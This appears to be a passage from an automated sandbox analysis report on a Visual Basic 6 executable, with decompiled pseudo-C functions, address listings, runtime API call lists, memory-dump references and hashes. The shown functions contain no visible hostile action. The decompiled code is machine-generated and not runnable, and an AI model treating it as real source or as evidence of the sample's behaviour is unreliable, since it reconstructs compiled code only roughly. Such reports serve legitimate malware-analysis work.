						_v72 = 0x41e010;
					}
					_t93 =  &_v28;
					L004015B8();
					_v44 = _t93;
					_t97 =  *((intOrPtr*)( *_v44 + 0x60))(_v44,  &_v36, _t93,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x300))( *_v72));
					asm("fclex");
					_v48 = _t97;
					if(_v48 >= 0) {
						_v76 = _v76 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40a0f4);
						_push(_v44);
						_push(_v48);
						L004015AC();
						_v76 = _t97;
					}
					if( *0x41e010 != 0) {
						_v80 = 0x41e010;
					} else {
						_push(0x41e010);
						_push(0x407448);
						L004015B2();
						_v80 = 0x41e010;
					}
					_t120 =  *((intOrPtr*)( *_v80));
					_t101 =  &_v32;
					L004015B8();
					_v52 = _t101;
					_t105 =  *((intOrPtr*)( *_v52 + 0x60))(_v52,  &_v40, _t101,  *((intOrPtr*)(_t120 + 0x308))( *_v80));
					asm("fclex");
					_v56 = _t105;
					if(_v56 >= 0) {
						_v84 = _v84 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40a120);
						_push(_v52);
						_push(_v56);
						L004015AC();
						_v84 = _t105;
					}
					_push(_t120);
					_v92 =  *0x401380;
					_t139 =  *0x401378 *  *0x401310;
					if( *0x41e000 != 0) {
						_push( *0x401214);
						_push( *0x401210);
						L00401444();
					} else {
						_t139 = _t139 /  *0x401210;
					}
					_v88 = _t139;
					 *_t126 = _v88;
					 *_t126 =  *0x401370;
					L004014CE();
					_t143 =  *0x401360;
					 *_t126 = _t143;
					asm("fild dword [ebp-0x24]");
					_v92 = _t143;
					_t144 = _v92;
					 *_t126 = _t144;
					asm("fild dword [ebp-0x20]");
					_v96 = _t144;
					 *_t126 = _v96;
					_t108 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t120, _t120, _t120, _t105, _t120, _t120);
					asm("fclex");
					_v60 = _t108;
					if(_v60 >= 0) {
						_v100 = _v100 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x409eb0);
						_push(_a4);
						_push(_v60);
						L004015AC();
						_v100 = _t108;
					}
					_push( &_v32);
					_t89 =  &_v28;
					_push(_t89);
					_push(2);
					L004015A0();
				}
				asm("wait");
				_push(0x41c986);
				L00401588();
				return _t89;
			}

0x0041c70d
0x0041c716
0x0041c717
0x0041c71f
0x0041c722
0x0041c72f
0x0041c734
0x0041c73a
0x0041c73e
0x0041c743
0x0041c752
0x0041c755
0x0041c757
0x0041c75e
0x0041c777
0x0041c760
0x0041c760
0x0041c762
0x0041c767
0x0041c76a
0x0041c76d
0x0041c772
0x0041c772
0x0041c786
0x0041c78d
0x0041c792
0x0041c798
0x0041c7a5
0x0041c7bf
0x0041c7a7
0x0041c7a7
0x0041c7ac
0x0041c7b1
0x0041c7b6
0x0041c7b6
0x0041c7da
0x0041c7de
0x0041c7e3
0x0041c7f2
0x0041c7f5
0x0041c7f7
0x0041c7fe
0x0041c817
0x0041c800
0x0041c800
0x0041c802
0x0041c807
0x0041c80a
0x0041c80d
0x0041c812
0x0041c812
0x0041c822
0x0041c83c
0x0041c824
0x0041c824
0x0041c829
0x0041c82e
0x0041c833
0x0041c833
0x0041c84d
0x0041c857
0x0041c85b
0x0041c860
0x0041c86f
0x0041c872
0x0041c874
0x0041c87b
0x0041c894
0x0041c87d
0x0041c87d
0x0041c87f
0x0041c884
0x0041c887
0x0041c88a
0x0041c88f
0x0041c88f
0x0041c89e
0x0041c89f
0x0041c8a8
0x0041c8b5
0x0041c8bf
0x0041c8c5
0x0041c8cb
0x0041c8b7
0x0041c8b7
0x0041c8b7
0x0041c8d0
0x0041c8d7
0x0041c8e1
0x0041c8ea
0x0041c8f0
0x0041c8f7
0x0041c8fa
0x0041c8fd
0x0041c900
0x0041c904
0x0041c907
0x0041c90a
0x0041c911
0x0041c921
0x0041c927
0x0041c929
0x0041c930
0x0041c94c
0x0041c932
0x0041c932
0x0041c937
0x0041c93c
0x0041c93f
0x0041c942
0x0041c947
0x0041c947
0x0041c953
0x0041c954
0x0041c957
0x0041c958
0x0041c95a
0x0041c95f
0x0041c962
0x0041c963
0x0041c980
0x0041c985

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041C717
__vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 0041C72F
#685.MSVBVM60(?,?,?,?,00401426), ref: 0041C734
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00401426), ref: 0041C73E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A300,0000001C,?,?,?,?,?,?,?,?,00401426), ref: 0041C76D
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041C78D
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041C7B1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041C7DE
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A0F4,00000060), ref: 0041C80D
__vbaNew2.MSVBVM60(00407448,0041E010), ref: 0041C82E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C85B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000060), ref: 0041C88A
_adj_fdiv_m64.MSVBVM60 ref: 0041C8CB
__vbaFpI4.MSVBVM60 ref: 0041C8EA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409EB0,000002C0,?,?,?,00000000), ref: 0041C942
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,00000000), ref: 0041C95A
__vbaFreeStr.MSVBVM60(0041C986,?,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041C980

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$#685ChkstkCopyList_adj_fdiv_m64
String ID:
API String ID: 4273703152-0
Opcode ID: 0a3b0d8692dd3df5de05bdb68c09ed2664d70a9d391464534a5b07b3f0ff7057
Instruction ID: a017d9be3307d38bce83e12910bd38ccde5597aad793f577544a0ecb1b7df323
Opcode Fuzzy Hash: 0a3b0d8692dd3df5de05bdb68c09ed2664d70a9d391464534a5b07b3f0ff7057
Instruction Fuzzy Hash: B0811775950208EFDB00EFA1CC89BEDBBB4FB48704F10446AF502BA1A0C7799895DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041BFD8, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041BFD8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v40;
				signed int _v44;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				intOrPtr _v104;
				intOrPtr _v112;
				char* _v120;
				char _v128;
				void* _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				short _t62;
				signed int _t65;
				signed int _t71;
				signed int _t77;
				intOrPtr _t93;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				L00401420();
				_v12 = _t93;
				_v8 = 0x4012e0;
				L00401576();
				_v56 = 0xe;
				_v64 = 2;
				_push( &_v64);
				_push( &_v80);
				L004014D4();
				_v120 = L"Out of string space";
				_v128 = 0x8008;
				_push( &_v80);
				_t62 =  &_v128;
				_push(_t62);
				L0040155E();
				_v132 = _t62;
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L0040159A();
				_t65 = _v132;
				if(_t65 != 0) {
					if( *0x41fb98 != 0) {
						_v156 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v156 = 0x41fb98;
					}
					_v132 =  *_v156;
					_t71 =  *((intOrPtr*)( *_v132 + 0x1c))(_v132,  &_v48);
					asm("fclex");
					_v136 = _t71;
					if(_v136 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40a258);
						_push(_v132);
						_push(_v136);
						L004015AC();
						_v160 = _t71;
					}
					_v140 = _v48;
					_v104 = 0x80020004;
					_v112 = 0xa;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t77 =  *((intOrPtr*)( *_v140 + 0x5c))(_v140, 0x10,  &_v44);
					asm("fclex");
					_v144 = _t77;
					if(_v144 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x40a288);
						_push(_v140);
						_push(_v144);
						L004015AC();
						_v164 = _t77;
					}
					_t65 = _v44;
					_v152 = _t65;
					_v44 = _v44 & 0x00000000;
					L0040156A();
					L004015A6();
				}
				_push(0x41c1be);
				L00401588();
				L00401594();
				return _t65;
			}

0x0041bfdd
0x0041bfe8
0x0041bfe9
0x0041bff5
0x0041bffd
0x0041c000
0x0041c00d
0x0041c012
0x0041c019
0x0041c023
0x0041c027
0x0041c028
0x0041c02d
0x0041c034
0x0041c03e
0x0041c03f
0x0041c042
0x0041c043
0x0041c048
0x0041c04f
0x0041c053
0x0041c054
0x0041c056
0x0041c05e
0x0041c064
0x0041c071
0x0041c08e
0x0041c073
0x0041c073
0x0041c078
0x0041c07d
0x0041c082
0x0041c082
0x0041c0a0
0x0041c0af
0x0041c0b2
0x0041c0b4
0x0041c0c1
0x0041c0e0
0x0041c0c3
0x0041c0c3
0x0041c0c5
0x0041c0ca
0x0041c0cd
0x0041c0d3
0x0041c0d8
0x0041c0d8
0x0041c0ea
0x0041c0f0
0x0041c0f7
0x0041c105
0x0041c10f
0x0041c110
0x0041c111
0x0041c112
0x0041c121
0x0041c124
0x0041c126
0x0041c133
0x0041c155
0x0041c135
0x0041c135
0x0041c137
0x0041c13c
0x0041c142
0x0041c148
0x0041c14d
0x0041c14d
0x0041c15c
0x0041c15f
0x0041c165
0x0041c172
0x0041c17a
0x0041c17a
0x0041c17f
0x0041c1b0
0x0041c1b8
0x0041c1bd

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041BFF5
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041C00D
#652.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00401426), ref: 0041C028
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041C043
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0041C056
__vbaNew2.MSVBVM60(0040A268,0041FB98), ref: 0041C07D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,0000001C), ref: 0041C0D3
__vbaChkstk.MSVBVM60(?), ref: 0041C105
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A288,0000005C), ref: 0041C148
__vbaStrMove.MSVBVM60(00000000,?,0040A288,0000005C), ref: 0041C172
__vbaFreeObj.MSVBVM60(00000000,?,0040A288,0000005C), ref: 0041C17A
__vbaFreeStr.MSVBVM60(0041C1BE), ref: 0041C1B0
__vbaFreeVar.MSVBVM60(0041C1BE), ref: 0041C1B8

Strings

Out of string space, xrefs: 0041C02D

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$#652ListMoveNew2
String ID: Out of string space
API String ID: 685055062-1418083887
Opcode ID: 8b7cf944e8a1832e8c24f198dafc39afd33a35f144ba1e1e4c0ae73655f24643
Instruction ID: 04617109a64ac3a934a57d8659130519e89082ba97017db39d5c0f0a61f38354
Opcode Fuzzy Hash: 8b7cf944e8a1832e8c24f198dafc39afd33a35f144ba1e1e4c0ae73655f24643
Instruction Fuzzy Hash: EB510871D40218EFDB10DFA5CC86BDDBBB4BB08304F5080AAE109B72A1DB785A89DF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041B733, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041B733(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				void* _v32;
				signed int _v36;
				intOrPtr _v44;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				signed int _v104;
				signed int _t52;
				char* _t56;
				signed int _t62;
				signed int _t68;
				intOrPtr _t84;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_push(0x54);
				L00401420();
				_v12 = _t84;
				_v8 = 0x401290;
				_v44 = 0x4b;
				_v52 = 2;
				_t52 =  &_v52;
				_push(_t52);
				L004014E6();
				L0040156A();
				_push(_t52);
				_push(0x40a338);
				L0040154C();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t52));
				L00401588();
				L00401594();
				_t56 = _v72;
				if(_t56 != 0) {
					if( *0x41fb98 != 0) {
						_v96 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v96 = 0x41fb98;
					}
					_v72 =  *_v96;
					_t62 =  *((intOrPtr*)( *_v72 + 0x4c))(_v72,  &_v32);
					asm("fclex");
					_v76 = _t62;
					if(_v76 >= 0) {
						_v100 = _v100 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40a258);
						_push(_v72);
						_push(_v76);
						L004015AC();
						_v100 = _t62;
					}
					_v80 = _v32;
					_v60 = 0xcb;
					_v68 = 2;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t68 =  *((intOrPtr*)( *_v80 + 0x1c))(_v80, 0x10,  &_v36);
					asm("fclex");
					_v84 = _t68;
					if(_v84 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40a340);
						_push(_v80);
						_push(_v84);
						L004015AC();
						_v104 = _t68;
					}
					_v92 = _v36;
					_v36 = _v36 & 0x00000000;
					_push(_v92);
					_t56 =  &_v24;
					_push(_t56);
					L004015B8();
					L004015A6();
				}
				_push(0x41b8c4);
				L004015A6();
				return _t56;
			}

0x0041b738
0x0041b743
0x0041b744
0x0041b74b
0x0041b74e
0x0041b756
0x0041b759
0x0041b760
0x0041b767
0x0041b76e
0x0041b771
0x0041b772
0x0041b77c
0x0041b781
0x0041b782
0x0041b787
0x0041b78e
0x0041b794
0x0041b79b
0x0041b7a3
0x0041b7a8
0x0041b7ae
0x0041b7bb
0x0041b7d5
0x0041b7bd
0x0041b7bd
0x0041b7c2
0x0041b7c7
0x0041b7cc
0x0041b7cc
0x0041b7e1
0x0041b7f0
0x0041b7f3
0x0041b7f5
0x0041b7fc
0x0041b815
0x0041b7fe
0x0041b7fe
0x0041b800
0x0041b805
0x0041b808
0x0041b80b
0x0041b810
0x0041b810
0x0041b81c
0x0041b81f
0x0041b826
0x0041b834
0x0041b83e
0x0041b83f
0x0041b840
0x0041b841
0x0041b84a
0x0041b84d
0x0041b84f
0x0041b856
0x0041b86f
0x0041b858
0x0041b858
0x0041b85a
0x0041b85f
0x0041b862
0x0041b865
0x0041b86a
0x0041b86a
0x0041b876
0x0041b879
0x0041b87d
0x0041b880
0x0041b883
0x0041b884
0x0041b88c
0x0041b88c
0x0041b891
0x0041b8be
0x0041b8c3

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041B74E
#572.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B772
__vbaStrMove.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B77C
__vbaStrCmp.MSVBVM60(0040A338,00000000,00000002,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B787
__vbaFreeStr.MSVBVM60(0040A338,00000000,00000002,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B79B
__vbaFreeVar.MSVBVM60(0040A338,00000000,00000002,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B7A3
__vbaNew2.MSVBVM60(0040A268,0041FB98,0040A338,00000000,00000002,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B7C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,0000004C,?,?,?,?,?,?,?,?,0040A338,00000000,00000002), ref: 0041B80B
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,0040A338,00000000,00000002), ref: 0041B834
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A340,0000001C,?,?,?,?,?,?,?,?,0040A338,00000000,00000002), ref: 0041B865
__vbaObjSet.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0040A338,00000000,00000002), ref: 0041B884
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0040A338,00000000,00000002), ref: 0041B88C
__vbaFreeObj.MSVBVM60(0041B8C4,0040A338,00000000,00000002,?,?,?,?,?,?,?,?,?,00401426), ref: 0041B8BE

Strings

K, xrefs: 0041B760

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$#572MoveNew2
String ID: K
API String ID: 1465751361-856455061
Opcode ID: f13201210e735859c2d8505ac05739585498e89801a164e4cd6184f6bb761cd5
Instruction ID: 96b325a6b23e0cb29f5cfc0ebbb66d134d11c6f86623c90b3bc1e201eb712b2c
Opcode Fuzzy Hash: f13201210e735859c2d8505ac05739585498e89801a164e4cd6184f6bb761cd5
Instruction Fuzzy Hash: 4E41E670D40208EFDB10EFD5C846BEDBBB4FF44704F50452AE501BB2A1D778A9868B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C999, Relevance: 24.1, APIs: 16, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041C999(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20, void* _a60) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v60;
				char _v64;
				short _v72;
				char _v80;
				signed int _v88;
				intOrPtr _v96;
				void* _v100;
				intOrPtr* _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				char* _t79;
				signed int _t83;
				signed short _t85;
				signed int _t89;
				signed int _t95;
				void* _t117;
				void* _t119;
				intOrPtr _t120;

				_t120 = _t119 - 0xc;
				 *[fs:0x0] = _t120;
				L00401420();
				_v16 = _t120;
				_v12 = 0x401398;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401426, _t117);
				L00401576();
				L00401576();
				if( *0x41e010 != 0) {
					_v128 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v128 = 0x41e010;
				}
				_t79 =  &_v64;
				L004015B8();
				_v104 = _t79;
				_t83 =  *((intOrPtr*)( *_v104 + 0x180))(_v104,  &_v100, _t79,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x314))( *_v128));
				asm("fclex");
				_v108 = _t83;
				if(_v108 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x40a120);
					_push(_v104);
					_push(_v108);
					L004015AC();
					_v132 = _t83;
				}
				_v72 = _v100;
				_v80 = 2;
				_t85 =  &_v80;
				_push(_t85);
				L004014BC();
				asm("sbb eax, eax");
				_v112 =  ~( ~( ~_t85));
				L004015A6();
				L00401594();
				_t89 = _v112;
				if(_t89 != 0) {
					if( *0x41fb98 != 0) {
						_v136 = 0x41fb98;
					} else {
						_push(0x41fb98);
						_push(0x40a268);
						L004015B2();
						_v136 = 0x41fb98;
					}
					_v104 =  *_v136;
					_t95 =  *((intOrPtr*)( *_v104 + 0x4c))(_v104,  &_v64);
					asm("fclex");
					_v108 = _t95;
					if(_v108 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40a258);
						_push(_v104);
						_push(_v108);
						L004015AC();
						_v140 = _t95;
					}
					_v112 = _v64;
					_v88 = _v88 & 0x00000000;
					_v96 = 2;
					L00401420();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t89 =  *((intOrPtr*)( *_v112 + 0x2c))(_v112, 0x10);
					asm("fclex");
					_v116 = _t89;
					if(_v116 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x2c);
						_push(0x40a340);
						_push(_v112);
						_push(_v116);
						L004015AC();
						_v144 = _t89;
					}
					L004015A6();
				}
				_push(0x41cbb1);
				L00401594();
				L00401594();
				return _t89;
			}

0x0041c99c
0x0041c9ab
0x0041c9b5
0x0041c9bd
0x0041c9c0
0x0041c9c7
0x0041c9d6
0x0041c9df
0x0041c9ea
0x0041c9f6
0x0041ca10
0x0041c9f8
0x0041c9f8
0x0041c9fd
0x0041ca02
0x0041ca07
0x0041ca07
0x0041ca2b
0x0041ca2f
0x0041ca34
0x0041ca43
0x0041ca49
0x0041ca4b
0x0041ca52
0x0041ca6e
0x0041ca54
0x0041ca54
0x0041ca59
0x0041ca5e
0x0041ca61
0x0041ca64
0x0041ca69
0x0041ca69
0x0041ca76
0x0041ca7a
0x0041ca81
0x0041ca84
0x0041ca85
0x0041ca8d
0x0041ca93
0x0041ca9a
0x0041caa2
0x0041caa7
0x0041caad
0x0041caba
0x0041cad7
0x0041cabc
0x0041cabc
0x0041cac1
0x0041cac6
0x0041cacb
0x0041cacb
0x0041cae9
0x0041caf8
0x0041cafb
0x0041cafd
0x0041cb04
0x0041cb20
0x0041cb06
0x0041cb06
0x0041cb08
0x0041cb0d
0x0041cb10
0x0041cb13
0x0041cb18
0x0041cb18
0x0041cb2a
0x0041cb2d
0x0041cb31
0x0041cb3b
0x0041cb45
0x0041cb46
0x0041cb47
0x0041cb48
0x0041cb51
0x0041cb54
0x0041cb56
0x0041cb5d
0x0041cb79
0x0041cb5f
0x0041cb5f
0x0041cb61
0x0041cb66
0x0041cb69
0x0041cb6c
0x0041cb71
0x0041cb71
0x0041cb83
0x0041cb83
0x0041cb88
0x0041cba3
0x0041cbab
0x0041cbb0

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041C9B5
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041C9DF
__vbaVarDup.MSVBVM60(?,?,?,?,00401426), ref: 0041C9EA
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041CA02
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041CA2F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,00000180), ref: 0041CA64
#592.MSVBVM60(00000002), ref: 0041CA85
__vbaFreeObj.MSVBVM60(00000002), ref: 0041CA9A
__vbaFreeVar.MSVBVM60(00000002), ref: 0041CAA2
__vbaNew2.MSVBVM60(0040A268,0041FB98,00000002), ref: 0041CAC6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A258,0000004C), ref: 0041CB13
__vbaChkstk.MSVBVM60(00000000,?,0040A258,0000004C), ref: 0041CB3B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A340,0000002C), ref: 0041CB6C
__vbaFreeObj.MSVBVM60(00000000,?,0040A340,0000002C), ref: 0041CB83
__vbaFreeVar.MSVBVM60(0041CBB1,00000002), ref: 0041CBA3
__vbaFreeVar.MSVBVM60(0041CBB1,00000002), ref: 0041CBAB

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ChkstkNew2$#592
String ID:
API String ID: 3234091540-0
Opcode ID: ed325fbcc95d5d44676279425aab55505fcde77760548b8b1a74c58a489bafa7
Instruction ID: 8ef2d95bdfebb6def2f3f0a034a2e07fbaf24ed0a4c519106593b67ab5a300bb
Opcode Fuzzy Hash: ed325fbcc95d5d44676279425aab55505fcde77760548b8b1a74c58a489bafa7
Instruction Fuzzy Hash: 1851E474D40208EFCB10DFA1D885BDDBBB4BF08304F50856AE405BB2A1DB79A985DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB1A, Relevance: 22.6, APIs: 15, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0041AB1A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v40;
				signed int _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				intOrPtr _v104;
				char _v112;
				intOrPtr _v136;
				char _v144;
				intOrPtr _v152;
				char _v160;
				void* _v180;
				signed int _v184;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				char* _t71;
				short _t75;
				char* _t80;
				char* _t84;
				signed int _t88;
				intOrPtr _t111;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				L00401420();
				_v12 = _t111;
				_v8 = 0x4011e8;
				L00401576();
				_push( &_v64);
				L0040153A();
				_push( &_v80);
				L0040153A();
				_v136 = 1;
				_v144 = 2;
				_push(1);
				_push(1);
				_push( &_v80);
				_push( &_v144);
				_t71 =  &_v96;
				_push(_t71);
				L0040152E();
				_push(_t71);
				_push( &_v64);
				_push(0x40a2b8);
				_push( &_v112);
				L00401534();
				_v152 = 1;
				_v160 = 0x8002;
				_push( &_v112);
				_t75 =  &_v160;
				_push(_t75);
				L0040155E();
				_v180 = _t75;
				_push( &_v112);
				_push( &_v96);
				_push( &_v64);
				_push( &_v80);
				_push(4);
				L0040159A();
				_t80 = _v180;
				if(_t80 != 0) {
					_v104 = 0x80020004;
					_v112 = 0xa;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_v72 = 0x80020004;
					_v80 = 0xa;
					if( *0x41e010 != 0) {
						_v196 = 0x41e010;
					} else {
						_push(0x41e010);
						_push(0x407448);
						L004015B2();
						_v196 = 0x41e010;
					}
					_t84 =  &_v48;
					L004015B8();
					_v180 = _t84;
					_t88 =  *((intOrPtr*)( *_v180 + 0x48))(_v180,  &_v44, _t84,  *((intOrPtr*)( *((intOrPtr*)( *_v196)) + 0x30c))( *_v196));
					asm("fclex");
					_v184 = _t88;
					if(_v184 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40a120);
						_push(_v180);
						_push(_v184);
						L004015AC();
						_v200 = _t88;
					}
					_v192 = _v44;
					_v44 = _v44 & 0x00000000;
					_v56 = _v192;
					_v64 = 8;
					_push( &_v112);
					_push( &_v96);
					_push( &_v80);
					_push(0);
					_push( &_v64);
					L00401528();
					L004015A6();
					_push( &_v112);
					_push( &_v96);
					_push( &_v80);
					_t80 =  &_v64;
					_push(_t80);
					_push(4);
					L0040159A();
				}
				_push(0x41ad5c);
				L00401594();
				return _t80;
			}

0x0041ab1f
0x0041ab2a
0x0041ab2b
0x0041ab37
0x0041ab3f
0x0041ab42
0x0041ab4f
0x0041ab57
0x0041ab58
0x0041ab60
0x0041ab61
0x0041ab66
0x0041ab70
0x0041ab7a
0x0041ab7c
0x0041ab81
0x0041ab88
0x0041ab89
0x0041ab8c
0x0041ab8d
0x0041ab92
0x0041ab96
0x0041ab97
0x0041ab9f
0x0041aba0
0x0041aba5
0x0041abaf
0x0041abbc
0x0041abbd
0x0041abc3
0x0041abc4
0x0041abc9
0x0041abd3
0x0041abd7
0x0041abdb
0x0041abdf
0x0041abe0
0x0041abe2
0x0041abea
0x0041abf3
0x0041abf9
0x0041ac00
0x0041ac07
0x0041ac0e
0x0041ac15
0x0041ac1c
0x0041ac2a
0x0041ac47
0x0041ac2c
0x0041ac2c
0x0041ac31
0x0041ac36
0x0041ac3b
0x0041ac3b
0x0041ac6b
0x0041ac6f
0x0041ac74
0x0041ac8c
0x0041ac8f
0x0041ac91
0x0041ac9e
0x0041acc0
0x0041aca0
0x0041aca0
0x0041aca2
